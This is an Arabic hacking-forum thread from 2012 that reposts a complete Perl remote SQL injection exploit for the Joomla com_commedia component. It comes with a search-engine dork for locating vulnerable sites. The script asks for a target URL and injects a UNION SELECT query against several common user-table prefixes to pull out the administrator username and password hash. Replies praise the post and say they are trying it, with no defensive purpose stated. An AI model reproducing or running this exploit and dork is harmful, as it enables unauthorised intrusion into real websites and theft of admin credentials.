Follow us on Twitter Follow us on Facebook Watch us on YouTube





العودة   development-point > [ أقسام حماية واختراق المواقع والسيرفرات ] > قسم اختراق المواقع والسيرفرات > قسم الثغـرات

الملاحظات


ثـغرة بـ: جوملا بلغة البيرل Joomla commedia Remote Exploit

السسلام عليككم ورحمة الله وبركـاتةة ذي ثغرة بجوملاُ م اطول عليككم ! طبعـاً الثغرة بلغة البيرل Exploit Title: Joomla commedia Remote Exploit dork:

إضافة رد
 
أدوات الموضوع انواع عرض الموضوع
قديم منذ /10-24-2012, 11:20 PM   #1
MhWy
Professional

الصورة الرمزية MhWy

MhWy غير متواجد حالياً

 رقم العضوية : 41
 تاريخ التسجيل : Oct 2012
 العمر : 34
 الجنس : ~ ذكر
 البلد : البـاحة
 المشاركات : 376
 إهتمامك : ~
 النقاط : 61
 قوة التقييم : MhWy will become famous soon enough

شكراً: 0
تم شكره مرة واحدة في مشاركة واحدة
افتراضي ثـغرة بـ: جوملا بلغة البيرل Joomla commedia Remote Exploit

السسلام عليككم ورحمة الله وبركـاتةة

ذي ثغرة بجوملاُ
م اطول عليككم !

طبعـاً الثغرة بلغة البيرل

كود:
Exploit Title: Joomla commedia Remote Exploit 
كود:
 
 dork: inurl:index.php?option=com_commedia 
 
 Date: [18-10-2012] 
 
 Author: Daniel Barragan "D4NB4R" 
 
 Twitter: @D4NB4R 
 
 Vendor: http://www.ecolora.org/ 
 
 Version: 3.1 (last update on Oct 7, 2012) and lowers 
 
 License: Commercial and Non-Commercial, affects 2 versions 
 
 Demo: http://www.ecolora.org/index.php/demo/commedia 
 
 Download: http://ecolora.com/index.php/programmy/file/5-plagin-mp3browser-dlya-muzykalnykh-satov-na-joomla-15 
 
 Tested on: [Linux(bt5)-Windows(7ultimate)] 
 
 Especial greetz:  Pilot, _84kur10_, nav, dedalo, devboot, ksha, shine, p0fk, the_s41nt 
 
 
Descripcion: Commedia - a component and content plugin that allows you to create a content table containing all of the MP3's that are present in any directory of your site, a FTP-server (folder, single path to ftp-file) or a HTTP(S)-server (DROPBOX, folder, single path to http-file or http-radio). Exploit: #!/usr/bin/perl -w ######################################## # Joomla Component (commedia) Remote SQL Exploit #----------------------------------------------------------------------------# ######################################## print "\t\t\n\n"; print "\t\n"; print "\t Daniel Barragan D4NB4R \n"; print "\t \n"; print "\t Joomla com_commedia Remote Sql Exploit \n"; print "\t\n\n"; print " :::Opciones de prefijo tabla users:::\n\n"; print " 1. jos_users 2. jml_users 3. muc_users 4. sgj_users \n\n\n"; use LWP::UserAgent; use HTTP::Request; use LWP::Simple; print ":::Opcion::: "; my $option=<STDIN>; if ($option==1){&jos_users} if ($option==2){&jml_users} if ($option==3){&muc_users} if ($option==4){&sgj_users} sub jos_users { print "\nIngrese el Sitio:[http://wwww.site.com/path/]: "; chomp(my $target=<STDIN>); #the username of joomla $user="username"; #the pasword of joomla $pass="password"; #the tables of joomla $table="jos_users"; $d4n="com_commedia&format"; $parametro="down&pid=59&id"; $b = LWP::UserAgent->new() or die "Could not initialize browser\n"; $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); $host = $target ."index.php?option=".$d4n."=raw&task=".$parametro."=999999.9 union all select (select concat(0x3c757365723e,".$user.",0x3c757365723e3c706173733e,count(*),".$pass.",0x3c706173733e) from ".$table."),null--"; $res = $b->request(HTTP::Request->new(GET=>$host)); $answer = $res->content; if ($answer =~ /<user>(.*?)<user>/){ print "\nLos Datos Extraidos son:\n"; print "\n * Admin User : $1"; } if ($answer =~/<pass>(.*?)<pass>/){print "\n * Admin Hash : $1\n\n"; print "\t\t# El Exploit aporto usuario y password #\n\n";} else{print "\n[-] Exploit Failed, Intente manualmente...\n";} } sub jml_users { print "\nIngrese el Sitio:[http://wwww.site.com/path/]: "; chomp(my $target=<STDIN>); #the username of joomla $user="username"; #the pasword of joomla $pass="password"; #the tables of joomla $table="jml_users"; $d4n="com_commedia&format"; $parametro="down&pid=59&id"; $b = LWP::UserAgent->new() or die "Could not initialize browser\n"; $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); $host = $target ."index.php?option=".$d4n."=raw&task=".$parametro."=999999.9 union all select (select concat(0x3c757365723e,".$user.",0x3c757365723e3c706173733e,count(*),".$pass.",0x3c706173733e) from ".$table."),null--"; $res = $b->request(HTTP::Request->new(GET=>$host)); $answer = $res->content; if ($answer =~ /<user>(.*?)<user>/){ print "\nLos Datos Extraidos son:\n"; print "\n * Admin User : $1"; } if ($answer =~/<pass>(.*?)<pass>/){print "\n * Admin Hash : $1\n\n"; print "\t\t# El Exploit aporto usuario y password #\n\n";} else{print "\n[-] Exploit Failed, Intente manualmente...\n";} } sub muc_users { print "\nIngrese el Sitio:[http://wwww.site.com/path/]: "; chomp(my $target=<STDIN>); #the username of joomla $user="username"; #the pasword of joomla $pass="password"; #the tables of joomla $table="muc_users"; $d4n="com_commedia&format"; $parametro="down&pid=59&id"; $b = LWP::UserAgent->new() or die "Could not initialize browser\n"; $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); $host = $target ."index.php?option=".$d4n."=raw&task=".$parametro."=999999.9 union all select (select concat(0x3c757365723e,".$user.",0x3c757365723e3c706173733e,count(*),".$pass.",0x3c706173733e) from ".$table."),null--"; $res = $b->request(HTTP::Request->new(GET=>$host)); $answer = $res->content; if ($answer =~ /<user>(.*?)<user>/){ print "\nLos Datos Extraidos son:\n"; print "\n * Admin User : $1"; } if ($answer =~/<pass>(.*?)<pass>/){print "\n * Admin Hash : $1\n\n"; print "\t\t# El Exploit aporto usuario y password #\n\n";} else{print "\n[-] Exploit Failed, Intente manualmente...\n";} } sub sgj_users { print "\nIngrese el Sitio:[http://wwww.site.com/path/]: "; chomp(my $target=<STDIN>); #the username of joomla $user="username"; #the pasword of joomla $pass="password"; #the tables of joomla $table="sgj_users"; $d4n="com_commedia&format"; $parametro="down&pid=59&id"; $b = LWP::UserAgent->new() or die "Could not initialize browser\n"; $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); $host = $target ."index.php?option=".$d4n."=raw&task=".$parametro."=999999.9 union all select (select concat(0x3c757365723e,".$user.",0x3c757365723e3c706173733e,count(*),".$pass.",0x3c706173733e) from ".$table."),null--"; $res = $b->request(HTTP::Request->new(GET=>$host)); $answer = $res->content; if ($answer =~ /<user>(.*?)<user>/){ print "\nLos Datos Extraidos son:\n"; print "\n * Admin User : $1"; } if ($answer =~/<pass>(.*?)<pass>/){print "\n * Admin Hash : $1\n\n"; print "\t\t# El Exploit aporto usuario y password #\n\n";} else{print "\n[-] Exploit Failed, Intente manualmente...\n";} } _____________________________________________________ Daniel Barragan "D4NB4R" 2012

المصدر: development-point - للمزيد تابع : قسم الثغـرات


eJyvm fJ: [,lgh fgym hgfdvg Joomla commedia Remote Exploit






  رد مع اقتباس
قديم منذ /10-25-2012, 08:18 AM   #2
Admin
الأدارة العامة

الصورة الرمزية Admin

Admin غير متواجد حالياً

 رقم العضوية : 1
 تاريخ التسجيل : Oct 2012
 الجنس : ~ ذكر
 المشاركات : 1,223
 النقاط : 58
 قوة التقييم : Admin will become famous soon enough

شكراً: 17
تم شكره 23 مرة في 23 مشاركة
افتراضي رد: ثـغرة بـ: جوملا بلغة البيرل Joomla commedia Remote Exploit

يعطيك العافية مبدعنا
ان شاء الله نجرب ونرد لك
خبر
لايك + تقيم + 5 ستار
شكرا لك






  رد مع اقتباس
قديم منذ /10-25-2012, 10:59 AM   #3
GENERAL BAGHDAD
.:: King Of Security ::.

الصورة الرمزية GENERAL BAGHDAD

GENERAL BAGHDAD غير متواجد حالياً

 رقم العضوية : 43
 تاريخ التسجيل : Oct 2012
 الجنس : ~ ذكر
 البلد : عہٰراقـہٰي و آفـہٰتہٰخہٰر
 المشاركات : 393
 النقاط : 69
 قوة التقييم : GENERAL BAGHDAD will become famous soon enough

شكراً: 0
تم شكره مرة واحدة في مشاركة واحدة
افتراضي رد: ثـغرة بـ: جوملا بلغة البيرل Joomla commedia Remote Exploit

روعة + جاري التجربة = تم التقيم






  رد مع اقتباس
قديم منذ /10-25-2012, 09:17 PM   #4
MhWy
Professional

الصورة الرمزية MhWy

MhWy غير متواجد حالياً

 رقم العضوية : 41
 تاريخ التسجيل : Oct 2012
 العمر : 34
 الجنس : ~ ذكر
 البلد : البـاحة
 المشاركات : 376
 إهتمامك : ~
 النقاط : 61
 قوة التقييم : MhWy will become famous soon enough

شكراً: 0
تم شكره مرة واحدة في مشاركة واحدة
افتراضي رد: ثـغرة بـ: جوملا بلغة البيرل Joomla commedia Remote Exploit

المشاركة الأصلية كتبت بواسطة admin مشاهدة المشاركة
يعطيك العافية مبدعنا
ان شاء الله نجرب ونرد لك
خبر
لايك + تقيم + 5 ستار
شكرا لك

الله يعافيك ي لبى قلبك
انا هنا بالمنتدى لأبدع فيه
انتم تستاهلون لبى
من ذوقك
منور






  رد مع اقتباس
قديم منذ /10-25-2012, 09:17 PM   #5
MhWy
Professional

الصورة الرمزية MhWy

MhWy غير متواجد حالياً

 رقم العضوية : 41
 تاريخ التسجيل : Oct 2012
 العمر : 34
 الجنس : ~ ذكر
 البلد : البـاحة
 المشاركات : 376
 إهتمامك : ~
 النقاط : 61
 قوة التقييم : MhWy will become famous soon enough

شكراً: 0
تم شكره مرة واحدة في مشاركة واحدة
افتراضي رد: ثـغرة بـ: جوملا بلغة البيرل Joomla commedia Remote Exploit

المشاركة الأصلية كتبت بواسطة general baghdad مشاهدة المشاركة
روعة + جاري التجربة = تم التقيم

تسسلم حبيبي من ذوقكك
خذ راحتك
منور






  رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)

جديد قسم الثغـرات


الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)
 
أدوات الموضوع
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع

المواضيع المتشابهه للموضوع: ثـغرة بـ: جوملا بلغة البيرل Joomla commedia Remote Exploit
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
ثغرة SQL في سكريبت Joomla EDZw4sS!m قسم الثغـرات 7 11-15-2013 04:48 AM
ثـغرة الورد بريس : Wordpress Social Discussions Plugin 6.1.1 Multiple Vulnerabilities MhWy قسم الثغـرات 10 09-02-2013 02:21 AM
أهم مواقع السكيورتي والبحث عن الثغرات Exploit & vulnerability Estudiante de hack قسم اختراق المواقع والسيرفرات 12 07-08-2013 02:26 PM
ثـغرة ببرنـامج سامسونق كايز Multiple Vulnerabilities MhWy قسم الثغـرات 7 11-14-2012 08:09 PM


الساعة الآن 07:30 PM

 



Powered by vBulletin® Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.
development-point